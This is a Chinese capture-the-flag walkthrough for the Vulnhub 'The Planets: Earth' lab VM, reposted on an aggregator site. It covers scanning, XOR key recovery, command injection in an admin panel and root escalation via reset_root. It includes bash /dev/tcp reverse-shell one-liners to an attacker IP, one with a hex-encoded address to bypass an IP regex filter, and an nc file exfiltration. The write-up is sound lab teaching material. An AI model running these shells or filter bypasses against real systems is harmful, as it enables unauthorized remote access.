Vulnhub 靶机 THE PLANETS: EARTHseo优化

Vulnhub 靶机 THE PLANETS: EARTH

news/2024/10/7 21:11:51

0x01信息收集

1.1、nmap扫描

IP段扫描，确定靶机地址

平扫描

nmap 192.168.1.0/24

扫描结果（部分）

Nmap scan report for earth.local (192.168.1.129)
Host is up (0.0015s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:61:E4:BE (VMware)

或者全端口全脚本ip段扫描（慢）

nmap -A -p- -v 192.168.1.0/24

扫描结果

TRACEROUTE
HOP RTT     ADDRESS
1   2.57 ms 192.168.1.2Nmap scan report for earth.local (192.168.1.129)
Host is up (0.0015s latency).
Not shown: 65369 filtered tcp ports (no-response), 163 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Earth Secure Messaging
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa:65d2:1a9e:0718:4b54:41da:3712:f187
|_SHA-1: 04db:5b29:a33f:8076:f16b:8a1b:581d:6988:db25:7651
| tls-alpn:
|_  http/1.1
|_http-title: Earth Secure Messaging
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
MAC Address: 00:0C:29:61:E4:BE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 19.199 days (since Tue Sep 17 23:32:55 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

得到信息

IP：192.168.1.129
开放端口：22 ssh 80 http 443  ssl
及其服务版本号

1.1.1服务查看

22端口——ssh服务

80端口——http（尝试ip访问界面）

访问没有结果

443端口——ssl(尝试重新访问)

ip访问是Fedora Webserver Test Page页面，尝试使用域名访问

发现443端口有DNS解析 DNS:earth.local, DNS:terratest.earth.local，在hosts文件中添加DNS解析

192.168.1.129	earth.local
192.168.1.129	terratest.earth.local

1.2、网页信息收集

添加完成访问页面

http://earth.local/

发现Previous Messages:

0d4252435841450f50435d45191349424213180d4252435841451e0f
0d4252435841450f50435d45191349424213180d4252435841451e0f
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

继续访问

https://terratest.earth.local/

在扫描中我们发现有ssl服务在这里其实我们两个网址都可以用https

1.3、目录扫描

earth.local目录扫描：

dirb https://earth.local/

结果：

┌──(root㉿kali)-[/etc]
└─# dirb https://earth.local/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Mon Oct  7 04:36:07 2024
URL_BASE: https://earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: https://earth.local/ ----
+ https://earth.local/admin (CODE:301|SIZE:0)
+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)-----------------
END_TIME: Mon Oct  7 04:36:34 2024
DOWNLOADED: 4612 - FOUND: 2

发现可疑目录：admin

terratest.earth.local目录扫描

dirb https://terratest.earth.local/

结果：

┌──(root㉿kali)-[/etc]
└─# dirb https://terratest.earth.local/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Mon Oct  7 04:38:50 2024
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)-----------------
END_TIME: Mon Oct  7 04:39:01 2024
DOWNLOADED: 4612 - FOUND: 3

发现可疑文件：robots.txt

1.3.1、访问目录

分别对admin、robots.txt进行访问

admin：

发现登录界面

robots.txt

发现文件Disallow: /testingnotes.*但不知道格式，进行爆破得到为txt格式

测试安全消息系统注意事项：
*使用XOR加密作为算法，在RSA中使用应该是安全的。
*地球已确认他们已收到我们发送的信息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做：
*我们如何安全地将每月的密钥发送到地球？ 或者我们应该每周更换钥匙？
*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间？
*需要改进消息界面和管理面板的界面，目前非常基础。

告诉我们加密算法是 XOR，并且有一个testdata.txt文档用于测试加密，用户名是terra，先访问testdata.txt并保存：

0x02漏洞攻击

1.1、XOR解密

写个简单py脚本，选一个Previous Messages数据，然后与 testdata.txt 进行一下 XOR 运算，得到密钥

脚本()：

import binasciidata1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"d1 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
d2 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
d3 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()print(hex(int(data1, 16) ^ int(d1, 16)))
print(hex(int(data2, 16) ^ int(d2, 16)))
print(hex(int(data3, 16) ^ int(d3, 16)))

得到结果

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

分别对其进行十六进制转文本解码:

得第三个解密:

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

根据前面猜测密码是：earthclimatechangebad4humans

1.2、登录后台

用户名：terra

密码：earthclimatechangebad4humans

1.3、命令执行

看起来像是个命令执行接口，让我们小心使用

反弹一个shell看看

bash -c 'exec bash -i &>/dev/tcp/192.168.1.128/6666 <&1'

发现没有用，翻一下有啥吧

查找 flag相关文件

find / -name "*flag*"

发现第一个flag

Command output: [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

继续翻

看看ls /var/www/html/terratest.earth.local有啥没有可用的

最后在/var/earth_web/secure_message/forms.py发现了服务器段采用了正则对IP进行数字匹配

1.4、shell反弹

把ip地址转换为16进制试试反弹

bash -c 'exec bash -i &>/dev/tcp/0xc0.0xa8.0x01.0x80/6666 <&1'

发现反弹成功

1.5、提权

查找可用权限

发现一个reset_root 运行一下

发现用不了

把文件导出来看看

nc -nlvp 7777 >reset_rootnc 192.168.1.129 7777 < /usr/bin/reset_root

使用 strace 命令进行调试

发现没有权限，给权调试一下看看

strace ./reset_root

发现缺失了三个文件，在靶机里面也没有

write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

在靶机里面创建三个文件之后运行reset_root

提权成功

查找flag

拿到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.ryyt.cn/news/68764.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈，一经查实，立即删除！

20241007

sequence 我们会发现,我们每次删的一定是长度最短的那个,所以我们可以最开始按照长的排一下序,然后用线段树维护每一个区间中还有几个数,每次加上答案后在两个端点打上标记即可 #include <bits/stdc++.h> #define _1 (__int128)1using namespace std; using ll = long lo…

软件工程week2课程作业|“物品复活“软件开发

“物品复活”软件开发作业要求大学生经常有些物品觉得扔掉可惜，不处理又觉得浪费自己的地方。请你编写一个物品“复活”软件该程序允许添加物品的信息（物品名称，物品描述，联系人信息），删除物品的信息，显示物品列表，也允许查找物品的信息你实现的程序可以采用命令行…

[42] (多校联训) A层冲刺NOIP2024模拟赛03

今天的乐子今天的乐子2 昨天晚上做梦梦见自己被关进戒网瘾学校里面的老师全和疯子一样然后我和这帮疯子老师比疯疯子老师发现他们没我疯所以就把我放了今天的乐子3 lhx 罗曼蒂克的辟谷A.五彩斑斓赛时的想法 \(n^4\) 的做法，设 \(f_{i,j,k,l}\) 表示以 \((i,j)\) 为左上角…

Metasploit渗透测试框架学习(一)基本使用教程

1.Metasploit框架结构 1.1总览基础库文件Rex为最底层，实现网络套接字、网络应用协议、客户端服务端交互、数据库支持等 framework-core实现与上层模块交互的接口 framework-base对framework-core的扩展封装，用于提供各种接口供用户调用基于framework-base实现的六大模块Explo…

统计学(十三)——相关分析

img { display: block; margin-left: auto; margin-right: auto } table { margin-left: auto; margin-right: auto } 相关分析是用于研究多个变量之间相互关系的统计方法，最早由英国统计学家卡尔皮尔逊（Karl Pearson）于1896年提出。皮尔逊通过对变量间线性关系的深入研究，…

前端模块化进化史：从全局 function 到 ES Modules

目前，前端开发已经离不开由 CommonJS、ES Modules 和 Webpack 构建的模块化开发环境。无论是 JavaScript、CSS、图片还是其他资源，都可以作为一个模块来处理。那么，模块化究竟是如何发展到今天的呢？全局函数模式最初的前端模块化尝试是通过全局函数来实现的。例如，在一…

CF131C题解

贪心，优先队列，CF 2200传送门：https://codeforces.com/problemset/problem/134/C 关注到题目的两个限制：1. 一个人只能与另外同一人交换一张卡牌。2. 一个人只能交换自己原来颜色的卡牌。对于2条限制条件，显然有贪心思路：尽量让更多的人手持原有的卡牌。对于当前待交换的…

『模拟赛』多校A层冲刺NOIP2024模拟赛03

『模拟赛记录』多校A层冲刺NOIP2024模拟赛03Rank 炸了，触底反弹A. 五彩斑斓（colorful）签，又没签上。考虑如何一步步优化暴力。最暴力的思想 \(\mathcal{O(n^4)}\) 枚举每个矩形，判断四个顶点颜色。稍微优化些，两次 \(\mathcal{O(n^2)}\) 跑出对于行/列每个点下一个与之…